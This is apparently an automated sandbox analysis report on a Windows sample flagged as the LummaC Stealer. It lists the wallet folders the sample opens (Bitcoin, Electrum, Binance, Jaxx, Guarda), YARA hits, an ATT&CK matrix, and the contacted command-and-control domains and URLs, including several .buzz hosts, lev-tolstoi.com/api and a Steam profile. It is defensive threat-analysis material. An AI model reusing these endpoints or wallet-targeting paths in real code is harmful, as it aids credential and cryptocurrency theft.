                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                      Source: Yara matchFile source: 00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MPgkx6bQIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.MPgkx6bQIQ.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      Process Injection                      		1
                      Virtualization/Sandbox Evasion                      		2
                      OS Credential Dumping                      		11
                      Security Software Discovery                      		Remote Services1
                      Screen Capture                      		21
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Process Injection                      		LSASS Memory1
                      Virtualization/Sandbox Evasion                      		Remote Desktop Protocol1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Deobfuscate/Decode Files or Information                      		Security Account Manager1
                      Process Discovery                      		SMB/Windows Admin Shares41
                      Data from Local System                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                      Obfuscated Files or Information                      		NTDS1
                      File and Directory Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                      Software Packing                      		LSA Secrets22
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MPgkx6bQIQ.exe42%VirustotalBrowse
                      MPgkx6bQIQ.exe55%ReversingLabsWin32.Trojan.AceCrypter
                      MPgkx6bQIQ.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://avatars.fa0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      steamcommunity.com
                      		23.55.153.106
                      		truefalse
                        		high
                        lev-tolstoi.com
                        		172.67.157.254
                        		truefalse
                          		high
                          cashfuzysao.buzz
                          		unknown
                          		unknownfalse
                            		high
                            scentniej.buzz
                            		unknown
                            		unknownfalse
                              		high
                              inherineau.buzz
                              		unknown
                              		unknownfalse
                                		high
                                prisonyfork.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  rebuildeso.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    appliacnesot.buzz
                                    		unknown
                                    		unknownfalse
                                      		high
                                      hummskitnj.buzz
                                      		unknown
                                      		unknownfalse
                                        		high
                                        screwamusresz.buzz
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          scentniej.buzzfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              rebuildeso.buzzfalse
                                                		high
                                                appliacnesot.buzzfalse
                                                  		high
                                                  screwamusresz.buzzfalse
                                                    		high
                                                    cashfuzysao.buzzfalse
                                                      		high
                                                      inherineau.buzzfalse
                                                        		high
                                                        https://lev-tolstoi.com/apifalse
                                                          		high
                                                          hummskitnj.buzzfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/chrome_newtabMPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://player.vimeo.comMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/ac/?q=MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcastsMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/subscriber_agreement/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.valvesoftware.com/legal.htmMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.comMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.comMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://s.ytimg.com;MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://steam.tv/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://lev-tolstoi.com/MPgkx6bQIQ.exe, 00000000.00000003.1587934272.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1560060236.0000000003049000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://store.steampowered.com/privacy_agreement/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://store.steampowered.com/points/shop/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://ocsp.rootca1.amazontrust.com0:MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sketchfab.comMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.ecosia.org/newtab/MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://lv.queniujq.cnMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brMPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.youtube.com/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/privacy_agreement/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://steamcommunity.com/profiles/76561199724331900/badgWMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.google.com/recaptcha/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://checkout.steampowered.com/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/;MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/about/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.steampowered.com/en/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/market/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/news/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://lev-tolstoi.com/apimMPgkx6bQIQ.exe, 00000000.00000003.1537846025.0000000003049000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/discussions/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/stats/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://medal.tvMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://x1.c.lencr.org/0MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://x1.i.lencr.org/0MPgkx6bQIQ.exe, 00000000.00000003.1560478022.000000000335D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://steamcommunity.com/workshop/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://login.steampowered.com/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allMPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://store.steampowered.com/legal/MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://avatars.faMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoMPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://recaptcha.netMPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://store.steampowered.com/MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=eMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://127.0.0.1:27060MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgMPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
